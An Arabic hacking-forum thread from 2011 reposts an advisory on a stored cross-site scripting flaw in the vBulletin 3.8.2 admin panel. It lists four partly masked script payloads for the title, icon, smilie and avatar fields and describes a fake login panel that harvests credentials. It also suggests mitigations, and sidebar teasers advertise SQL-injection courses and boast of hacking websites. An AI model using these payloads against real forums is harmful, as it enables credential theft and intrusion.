1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

غرة جديده في منتديات 3.8.2 vBulletin 3.8.2 adminCP Cross-Site Scrip

الموضوع في 'حماية المواقع والسيرفرات' بواسطة Dr.hac, بتاريخ ‏6 نوفمبر 2011.

كاتب الموضوع : Dr.hac المشاهدات : 434 الردود : 2 ‏6 نوفمبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    Dr.hac
    rankrank
    Developer

    عضو منذ:
    ‏8 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    بسم الله الرحمن الرحيم

    الثغرة و انا ادور لقيتها و حبيت اطرحها لعل و عسى انه نستفيد و نقفلها

    الثغره هي .. صورتين وملف هتكس .. ويقوم المهاجم بوضع رابط في اي موضوع ..

    وعند دخول اي شخص يطلع له لوحة مثل الفلتر وعند وضع الباس واليوزر ينرسل إلى ملف التكست او الكوكيز ..

    يعني الثغره زي Add a new title+Post Icons+post new Smilies



    .. حل الثغره ..

    تغيير مجلد الـ admincp .. ووضع جدار ناري .. ==> حل مؤقت لين ما يفرجها ربي

    و الحمدلله اتوقع الكثير مقفلين ادمن سي بي و مغيرينه يعني ما راح تكون خطيرة

    و ان شاء الله ينزل ترقيع رسمي

    كود PHP:
    vBulletin 3.8.2 adminCP Cross-Site Scripting
    R
    .I.P DrtRp We miss you
    ---------------------------------------------
    Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
    Greetz to Aura all Aria-Security Mods Members

    These were all tested on vbulletin 3.8.0 RC2 so other version may be effected
    .

    1. Users Titleadmincp/usertitle.php?do=modifyAdd a new title. use the following code as title name.

    <
    script>********.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    or 
    any other XSS code.

    2.Post Iconsadmincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif.  use the following code as title name.

    <
    script>********.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

    3.Post new Smiliesimage.php?do=add&table=smilie ... SAME AS #2.  use the following code as title name.

    <script>********.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

    4.New avataradmincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.

    <script>********.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
     


    جاري تحميل الصفحة...
  2. غير متصل

    Dr.CooBrA_NeT
    Active DeveloPer

    عضو منذ:
    ‏5 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: غرة جديده في منتديات 3.8.2 vBulletin 3.8.2 adminCP Cross-Site Scrip

    شكرا لك يالغالي !:"
     


  3. غير متصل

    MR.BLAMS
    rank
    Developer

    عضو منذ:
    ‏17 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: غرة جديده في منتديات 3.8.2 vBulletin 3.8.2 adminCP Cross-Site Scrip

    تسلم مان بس صارة التغرة معروفة من الجميع i:q4^:​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...